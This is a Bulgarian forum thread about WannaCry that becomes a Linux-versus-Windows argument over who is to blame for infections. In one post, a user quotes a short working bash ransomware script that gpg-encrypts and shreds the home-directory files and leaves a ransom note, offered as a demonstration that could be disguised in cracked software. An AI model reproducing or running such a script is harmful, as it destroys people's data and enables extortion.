Премини към съдържанието
  • Добре дошли!

    Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

    Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

     

WanaCry 2.0 kill switch


Гости dkmi
 Сподели

Препоръчан отговор

преди 1 час, dkmi написа:

1. Не ползвам Виндовс.

2. За саморепликирането - за това ПАК са виновни потребителите, а не операционната система!!!!!! Кой ги бие да си забраняват обнивяванията или да ползват пиратски Виндовс? Аз ли?

3. Ами търсещите финансова облага щом атакуват само Виндовс и домашни потребители - значи знаят какво правят. А и не печелят зле, между другото. Да, сриването на някаква институция ще нанесе по-големи щети, но! 1. Там ВИНАГИ има бекъп; 2. Там ВИНАГИ се ползват актуални версии на софтуера; 3. Там има изградена някаква политика кое как да се ползва. И не на последно място: удряйки една финансова борса например, ще предизвикат такова разследване, че 100% ще ги хванат. А те не искат да са интересни за службите. Защо създателите на WanaCry  не си теглят биткойните? Защото се зашумя прекалено много около него. 

Ето, например как (уж) севернокорейците бяха ударили някаква банка и източиха милиарди? Прониквайки в мрежата на банката през стар рутер. А с какво рабори рутера? С линукс :)  Ама като не го обновиш когато трябва - така става. Удрянето на домашни потребители е много по-изгодно. Защото ако затриеш снимките на някоя кифла ще получи удар ако не си ги върне. Те на това и разчитат, и стратегията им е доста успешна. Това може да го направи всеки с малко по-добри познания. А да удариш нещо като банка, борса, държавна институция - се иска много повече. Както и трябва да ти е ясно, че там нещата могат да станат МНОГО груби, и че шанса да те хванат клони към 100%.

4. Относно "сериозните линукс потребители" и ползването на емулатори и т.н. - не знам какво визираш под "сериозни линукс отребители"? Например, почти всеки иска да си подкара дадена игра. И ако има шанс тази игра да тръгне с Wine - я пускат с Wine. А това отвяря много врати... самото му инсталиране на Вине-то. Аз до сега не съм виждал линуксаджия, който да няма Вине. Ако за теб това не е "сериозен линукс потребител" - не знам какво да отговоря.

Кое не си заслужава коментара? Това, че масово "разбирачите" се имат за нещо повече от другите, и нещо мнооооого велико, и отблъскват потребителите ли? Или онова, че когато някой вземе нещо тяхно е много лошо, но когато те крадат - това е свобода?

Защо беше целия този рев като бяха дръпнали шалтера на Замунда/Арена и т.н? И как това било ограничавало свободата им? А в същото време - ако Санчо си е снимал котката, и аз му кача снимката някъде - съм най-долния крадец?

1. Всеки сам избира какво да ползва, ние тук не говорим кой какво ползва и кое е по-добро, а какви са възможностите дадени проблеми със сигурността да се експлоатират на практика.

2. Виновни били потребителите, айде пак - и за какво са виновни. Ясно е, че от незнанието на обикновения потребител няма спасение и а го казах по-горе, което е нещо нормално, ама от Wannacry не бяха засегнати само хоум потребители. Искаш да ми кажеш, че в Английската здравна система, Тelefonica, Renault, FedEx и засегнатите руски и китайски финансови/ведомствени структури работят все noobs админи, които не са наясно, че трябва да се ъпдейтва. Коментирал съм го това вече и съм си изразил позицията, не ми се повтарят нещата: ТУК | ТУК Да не говорим за някои от поддържаните все още версии на Windows какви проблеми имаше с актуализациите, и че за 7-цата примерно се точеха по 3 дни с 100% натоварен процесор, е как да не ти се отще да ъпдейтваш.

3. Имаш интересна позиция за психологията на престъпника, защото тези целящи финансови облаги са именно такива. Значи според теб те предпочитат да рискуват да ги хванат и така или иначе да лежат в затвора за цел 50 000 долара или да рискуват за няколко милиона. Ми не знам може и така да е, звучи ми логично... Относно втората част, кой рутер работи с Линукс? Повечето масови професионални решения за рутери нямат нищо общо с Линукс, а си имат собствен софтуер м/у впрочем и със затворен код. За останалата част основно се ползва BSD, което в никакъв случай не може да се нарече Линукс.

4. Това, че ти до сега не си виждал хора, които основно използват Линукс без Wine не значи, че няма, за да се правят генерални изводи. Аз съм виждал, познавам и контактувам ежедневно с такива поне 15 човека, но това повод ли е за обобщаване.

Коментара не си заслужава, защото никой никого не отблъсква. Това е твоята гледна точка и аз много добре разбирам защо ти е такава. Напротив всеки потребител, който е решил по един или друг начин да мине/използва/изпробва Линукс дистрибуция, ще му се помогне нормално без да се вири глава, стига самия той да не е ограничен от фенщината си и слепия култ към Windows и същевременно търсейки помощ да обяснява колко скапан бил Линукса щот' видиш ли се очаквало да работи като Win и той не е доволен. Именно тогава повече потребители на Линукс нямат желание да споделят решения, защото самите те се отвращават от генерализирането и определенията

Темата за авторските права и интелектуален труд е много обширна и пак ти казвам нещата не са черно и бяло и не са сапоставими. Много хора примерно се бунтуват с/у това да се държат авторски права от трети страни, които нямат много общо с този интелектуален труд, както е при книгите примерно и т.н. Не ме разбирай погрешно не толерирам пиратството и кражба на труда, обаче трябва да има рамки, които в момента много удобно се използват единствено от монополисти и само с цел печалби.

 

преди 1 час, winfan написа:

Хм, не съм толкова сигурен. Дупката е запушена с april rollup update-a, а wannacry не ''удари'' ли май месец? Ако следваме логиката, не майкрософт е виновен, а потребителят, който освен, че е спрял ъпдейтите, не се сеща да инсталира поне security updates.

Виж т.2 от горе

Редактирано от exwol (преглед на промените)
Линк към коментара
Сподели в други сайтове

преди 45 минути, exwol написа:

Това е твоята гледна точка и аз много добре разбирам защо ти е такава. Напротив всеки потребител, който е решил по един или друг начин да мине/използва/изпробва Линукс дистрибуция, ще му се помогне нормално без да се вири глава, стига самия той да не е ограничен от фенщината си и слепия култ към Windows и същевременно търсейки помощ да обяснява колко скапан бил Линукса щот' видиш ли се очаквало да работи като Win и той не е доволен. Именно тогава повече потребители на Линукс нямат желание да споделят решения, защото самите те се отвращават от генерализирането и определенията

 

Съгласен съм с повечето от нещата които казваш, но специално това - категорично НЕ. Последните 2-3 седмици чета основно линукс темите. Там повече се коментира/обижда, колко смотан е Windows и тези които го ползват, отколкото нещо съществено. Да не говорим, че са толкова advanced...имам чувството че в темите за линукс, поне тук, пишат 10-15 годишни, които не знаят, защо ползват линукс (с малки изключения), което е учудващо. Очаквах точно обратното. И по-конкретно тези  теми:
1. Ако си начинаещ в Линукс, задай въпроса си тук
2. Снимки на Вашия Linux - част 2
3. 
Новини от света на Linux дистрибуциите
4. Трябва ли да си Мазохист за да ползваш Линукс

Да си видял в уин теми да се говори с такова пренебрежение за линукс потребителите? Всъщност в уин тема няма и да видиш някой да коментира Линукс, просто защото на никой не му пука за тях. Дори няма да се учудя, ако повечето дори не знаят, че такива съществуват. В Линукс темите, обаче не само се коментира, но и се влага злоба в коментарите. Ако не си съгласен ще ти линкна поне 20 поста (не ме карай, че ме мързи в момента) :) 

 

Редактирано от winfan (преглед на промените)
Линк към коментара
Сподели в други сайтове

Извинявай, но последната тема, която посочваш ("Трябва ли да си...") е хейт тема, открита от Уин потребител в Линукс подфорума.

Линк към коментара
Сподели в други сайтове

Не знам защо темата се извъртя по този начин (Линукс срещу Виндовс), това което опитах да покажа (и мисля, че успях) е, че операционната система НЕ е виновна за заразите в 99% от случаите. И че както при Виндовс, така и при Линукс нещата могат да се случат по подобен начин.

Познавам хора, които ползват линукс, и всички са на мнение, че те са недосегаеми. Но в същото време - ползват Wine, инсталират игри, и ги "кракват".... говоря за такъв тип потребители, и че каквото и да им се случи - не им е виновна операционната система.Да се върнем към нещо подобно, набутано в софтуер, който потребителят е подлъган да инсталира, или е набутан в някой крак и т.н.:

Цитат

 

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`
for f in $(find ~/ -name '*.txt' -or -name '*.jpg' -or -name '*.png'); do echo $ENCRYPT | gpg --batch --no-tty --yes --passphrase-fd 0 -c -o $f.enc $f; shred $f; echo "Send 10000 bitcoins to get your data back">$f; done
echo "$ENCRYPT">PRIVATE.KEY;

 

Kолко потребителя ще погледнат "крака", преди да го стартират? 

И да, ако позлваш софтуер САМО от официални източници - няма (големи) основания за притеснение. Колко обаче го правят? Ето, наскоро се оказа, че може да се вгради експлойт дори в... субтитрите на филма :) И демонстрацията беше направена точно с проникване в Линукс. - https://www.kaldata.com/it-новини/check-point-откри-уязвимост-за-хакване-на-компю-248475.html 

Виновника не е линукс, а VLC и редица други плеъри, но... какво значение има това, след като всеки ги ползва?  И сега - Линукс ли е виновен? Разбира се, че не. Точно както се случва със заразите при Виндовс - в 99% от случаите са по вина на потребителите. Дори аз на Мак-а имам VLC, и ако пусна "хакнати" субтитри - могат да ме "ударят".  

Ако обаче си фен на "софтуера на кило", обичащ кракнатите неща и да "прецакваш системата" - то няма значение с каква ОС си. Просто не приемам аргуентите на повечето линуксаджии, които твърдят, че "ако ползваш Линукс забравяш за вирусите".

Линк към коментара
Сподели в други сайтове

Ами това, което съм показал като пример по-горе е добър вариант за PenguinCry :) само трябва да се прикрие по подходящ начин, и се получава много интересна ситуация.

Ако нямаш ключа, иди разкриптирай....

А между другото, има ransomware и за линукс, дори има и успешни атаки. Всички използват пропуски и/или остарели версии на "нещо", за да експлойтнат машината, и да си свършат работата вътре. Това, че не е масово явление е именно защото Линукс заема под 1% пазарен дял от към десктоп системите.

А за сървър вече казах мнение защо такива неща са (почти) изключени: системите се администрират на ниво, софтуера се обновява, не на последно място - има бекъпи. Нещо, което е валидно за много малък брой домашни десктоп системи. В момента, в който (ако) Линукс вземе някакъв приличен дял (да кажем - 15%) непременно ще има атака и там.

то вече има някакви опити:

 https://news.drweb.com/show/?i=9783&lng=en

https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/

https://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/

 

WanaCry изигра малко лоша шега на авторите си, като зарази голям брой компютри по разни институции, та се раздуха до небето. И сега биткойните им си седят по портфейлите, и не ги пипат. Не се знае и дали изобщо някога ще ги пипнат.

Линк към коментара
Сподели в други сайтове

преди 2 часа, ZeroG написа:

Грешиш, не коментират защото нямат никаква компетентност по отношение на Линукс.
Докато всеки Линукс потребител има някаква компетентност за Уиндоус, в каква степен е друг въпрос.

 

Ползвал съм за кратко Snow Leo, Lion, El Cap, Sierra, Elementary OS/Ubuntu. Познанията ми за тези ОС не са като на потребители, които ги ползват от години, но все пак имам някакви наблюдения върху въпросните ОС, но не ''коментирам'' в темите за Windows, как Linux не става, защото...става. Всяка от тези ОС става, докато софтуеъра, който ползваш работи/се разработва за нея. Съгласи се, повечето, които са имали/имат проблем с Win7 (за 10-ката не коментирам, тъй като е л@йно, според мен), на 100% са ползвали/ползват оптимизиращи програми, чистачи на регистри, поне няколко антивирусни пакета са сменили, които  се вкореняват в ОС и дори след премахването им не се знае, дали не са омазали нещо. Като добавим спирането на UAC, обновленията, инсталирането програми/игри от къде ли не, кликането на next>next при инсталиране на програми, без да се махат отметките на талаша, плюс последните години модата с миньорите, които доста често идват с крака за игра...хм, положението става страшно. Мисълта ми е, че голяма част от проблемите се дължат на ЗКУ-то, не че ОС-а е калпав. Защото аз на две различни конфигурации съм ползвал/ползвам Win7 и син екран съм виждал точно 3 пъти за 10 год .Първият заради Касперски, преди...десетина години или там някъде, който проблем бе фикснат с ъпдейт на антивируса. Вторият заради дефектна r9 290. Третият, когато ми изгоря gtx780. И в трите случая ОС-а, нямаше нищо общо. А не е като да не съм правил какви ли не простотии на 7-цата. Смея да твърдя, че не се чупи лесно, да не кажа, ултра/мега трудно. Ако някой постоянно я чупи...не знам. Тряя да е доста кораво копеле :D

 

преди 1 час, ZeroG написа:

Линукс не е неуязвим абсолютно, а е по-неуязвим относително спрямо Windows.
 

Напълно съгласен съм :)

Редактирано от winfan (преглед на промените)
Линк към коментара
Сподели в други сайтове

преди 9 часа, winfan написа:

Съгласен съм с повечето от нещата които казваш, но специално това - категорично НЕ. Последните 2-3 седмици чета основно линукс темите. Там повече се коментира/обижда, колко смотан е Windows и тези които го ползват, отколкото нещо съществено. Да не говорим, че са толкова advanced...имам чувството че в темите за линукс, поне тук, пишат 10-15 годишни, които не знаят, защо ползват линукс (с малки изключения), което е учудващо. Очаквах точно обратното. И по-конкретно тези  теми:

Да си видял в уин теми да се говори с такова пренебрежение за линукс потребителите? Всъщност в уин тема няма и да видиш някой да коментира Линукс, просто защото на никой не му пука за тях. Дори няма да се учудя, ако повечето дори не знаят, че такива съществуват.

Просто недей, това което казваш няма нищо общо с истината. Преобладават хората, които отговарят нормално. Не казвам, че няма менения на известен хейт в една или друга посока, но пак ти казвам това винаги е предизвикано. Не ме карай пък аз да ти вадя такива 1000 постове (че и от днес дори) от слабоумници дето инсталират един Win и решават, че разбират от всичко и отгоре на това дават компетентни мнения, определени, класификации със заключения. По втората част, знаеш ли през къде точно ми е дали някакви твърди Уин потребители не били знаели, че съществуват Линукс дистрибуции или не били ги коментирали. Който смята да се мери с некадърници пътя му е чист. Проблема не е в това, че над 95% от хората не са ИТ специалистии да са запознати с детайлите. Това е нещо нормално и всеки се развива в определена сфера. Проблема, е че живеем в технологичен век, всеки е юрнал и се натиска да ползва всякакви техно джажи, ами за такова нещо се иска поне елементарна обща култура, както м/у впрочем и за всичко останало в тоя живот. И да  завърша със спама, някои от темите дето и посочил не са с цел помощ, а са откровен хейт, как смяташ дали е нужно някой да отговоря нормално в тях.

 

преди 8 часа, dkmi написа:

Не знам защо темата се извъртя по този начин (Линукс срещу Виндовс), това което опитах да покажа (и мисля, че успях) е, че операционната система НЕ е виновна за заразите в 99% от случаите. И че както при Виндовс, така и при Линукс нещата могат да се случат по подобен начин.

Познавам хора, които ползват линукс, и всички са на мнение, че те са недосегаеми. Но в същото време - ползват Wine, инсталират игри, и ги "кракват".... говоря за такъв тип потребители, и че каквото и да им се случи - не им е виновна операционната система.

Явно не си ме разбрал правилно по отношение на позицията, която изразих и откровено продължаваш в тая грешна посока да си пееш. Как да е, вихри се на воля, така или иначе само една малка част от хората и основно такива дето се ровят по пясъчника цял ден, ще приемат въпросните Линукс "тестове" за сериозна заплаха в сигурността. И пак ще се потретя може би, тук не става въпрос дали потребителя ще намаже нещо. Точно за това ти дадох примера, че ако потребител реши, може и с чук да си шибне 5-6 пъти харда, кой може в такава ситуация да му опази файловете? Не съм обръщал темата Windows v Linux, говорех конкретно защо показаното от теб не е база за генерални изводи и сравнения, че нещата са подобни при всички ОС, т.е. искам да кажа ти да не сравняваш Уин с Линукс. Тук говорим за практически възможности за реализиране на вектори на уязвимост, които засягат операционната система без активното участие на потребителя, какъвто беше случая с WannaCry. Неща като елементарно повишаване на права до администратор, също без активното участие на потребителя. Неща като изпълнение на код през браузер и т.н., ако това не го разбираш не знам какво да ти кажа друго и моето участие в тази безсмислена тема приключва тук. Ако си открил или виждаш наистина сериозни, критични пропуски в сигурността, каквито имаше няколко през последните 2-3 години, може да си говорим, но това, което си снимал е детинщина. Също така, крипто вирусите не са чак такава сериозна заплаха, има къде по опасни неща, които буквално могат да застрашат човешки животи, ама до тука с тая тема. Говориш ми за Линукс потребители дето инсталирали софтуер на кило от където им попадне, wine, игри - глупости на бели квадрати. Къде са тези, защо го правят, след като имат екосистемата на дистрибуция. Явно това са гламави потребители дето няма как да им се помогне. Влез в Линукс раздела дори на този форум и питай да видиш дали някои, който редовно ползва тази ОС се държи по такъв начин. Тия дето ми ги даваш за пример са наследили поведението си именно от Windows, но това не са потребители на Линукс. Тия просто инсталират някоя дистрибуция за да тестват, мажат, квацат и очакват да работи като Windows, след 5 дена зарязват и после компетентно разказват и дават оценки, което става и кое не.

Линк към коментара
Сподели в други сайтове

За потребителите, които инсталират софтуер на кило съм съгласен, че имат наследено поведение, но за това са виновни онези, от които се учат. Защото им повтарят как линукса е нещо като виндовс, и как за него няма вируси. И те са спокойни да инсталират на воля. 

относно омазването на линукс няколко пъти казах, че и там става по вина на потребителя. То е същото като при виндовс - стартиране на софтуер от непроверен източник, и готово. Не знам защо си мислиш, че никой не го прави :)

друг проблем е, че съм виждал инсталиран линукс и необновяван повече от година. Е, бяха го "хакнали" ама не е виновен линукса, а ползващият го. Виждал съм и роотнат сървър пак поради такава причина - инстал, конфигуриране и зарязване... е, какво се очаква да стане?

е мрежата имам 30-тина виндовса, около 130 мак-а, и към 40 линукс сървъра.

до сега никъде не е имало проблем, с едно изключение - нарочно пускане на вирус преди години. Беше се настанил във всяка една shared директория по самба-та. И да, беше влязъл от един виндовс, към койтл е включена флашка.

но при спиране на всякакви защити на виндовса (нарочно) няма никакъв проблем да се зарази.

от тогава никой, без изключение няма администраторски права и няма никакви проблеми. Ако пък случайно се омаже  нещо - veeam ще се справи :)

 

 

 

Линк към коментара
Сподели в други сайтове

преди 21 часа, exwol написа:

компетентно

Именно там май е заровено кучето - усещането за компетентност...  Лично на мен ми е по-добре да гледам на себе си, като на ЛАИК и да се опитвам да повиша своята компетенция, знаейки, че винаги може още и така ще е..

 

 

Редактирано от Мальчик Бананан (преглед на промените)
Линк към коментара
Сподели в други сайтове

Хм... открих още нещо интересно, но няма как да го тествам поради липса на биткойни.

Би трябвало файловете да се отключат ако на съответните адреси се изпратят 0.01/0.02 биткойна. Или дори 0.001/0.002. Въпросът е числото да е кратно на 300/600 доларов еквивалент - според зависи колко иска вируса :)

Сега ще помоля един агент да ми прати 0.01 биткойна, и ако се навие, и ще го изтествам.

Няма никакъв хак, нищо - просто (според мен) не правят проверката съвсем точно.

Ако стане... ще и изнудвам писачите чрез съобщение, че ако не ми пратят биткойни - ще разглася информацията публично :)

А аз така или иначе ще го направя де....

Редактирано от dkmi
добавяне на информация (преглед на промените)
Линк към коментара
Сподели в други сайтове

Бе ти какво сам си пишеш глупости? Няма известен случай някой платил откуп да е разкодирал каквото и да е и да си е върнал информацията. Отделно на това че има оригинален криптобоклук и копия с променени суми и сметки за откуп. Отделно че и авторите са допуснали грешка, че и плащане не може да стане. Да не казвам че според изследователите всеки файл се шифрова с различен случаен ключ и по теория няма разкодиране.

Линк към коментара
Сподели в други сайтове

преди 21 часа, Филипов написа:

Бе ти какво сам си пишеш глупости? Няма известен случай някой платил откуп да е разкодирал каквото и да е и да си е върнал информацията. Отделно на това че има оригинален криптобоклук и копия с променени суми и сметки за откуп. Отделно че и авторите са допуснали грешка, че и плащане не може да стане. Да не казвам че според изследователите всеки файл се шифрова с различен случаен ключ и по теория няма разкодиране.

Лично познавам двама, които са плащали, за да си отключат файловете, и са успели. Не става въпрос конкретно за този криптовирус, а за друг, но това няма значение. Файловете се отключват, защото ако не се отключат - ще се разчуе прекалено бързо, и няма кой да им плати.

Има вариант дори за безплатно отключване (wanakiwi), но... не трябва компютъра да е рестартиран, за да сработи този метод.

И, в никакъв случай не подканвам някой да плаща каквото и да е на когото и да е :)

Защо да нямам моднат криптовирус, след като си го държа при мен за тестове във виртуалка???? И що да не го дезасемблирам, и да си правя каквито си искам експерименти - с моят биткойн портфейл, в моята мрежа, на моят компютър?

Кои са тези изследователи, които са го казали това? Да си сменят работата веднага!

Точно този вирус криптира файловете с един ключ, който се генерира уникално за всеки комптър (а не всеки файл), и този ключ се изпраща през ТОР на командният сървър на вируса. При успешно плащане - декриптора изтегля ключа, и го използва за да декриптира файловете. Wanakiwi се възползва именно от недоглеждане: 

Ключа остава активен в RAM паметта, и не се изчиства от там. Въпросният инструмент (wanakiwi) взема ключа, и го подава към декриптора, който декриптира файловете - без да платиш, без нищо. НО! Работи само на 32-битови версии... и ако НЕ си рестартирал - https://github.com/gentilkiwi/wanakiwi

Е, има друго недоглеждане, което забелязах в декриптора - че той просто проверява за плащане, а не проверява колко е платено. Няма гаранция обаче, че такава проверка не се прави на сървъра.

Линк към коментара
Сподели в други сайтове

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

Гост
Напишете отговор в тази тема...

×   Вмъкнахте текст, който съдържа форматиране.   Премахни форматирането на текста

  Разрешени са само 75 емотикони.

×   Съдържанието от линка беше вградено автоматично.   Премахни съдържанието и покажи само линк

×   Съдържанието, което сте написали преди беше възстановено..   Изтрий всичко

×   You cannot paste images directly. Upload or insert images from URL.

 Сподели

×
×
  • Добави ново...

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите Условия за ползване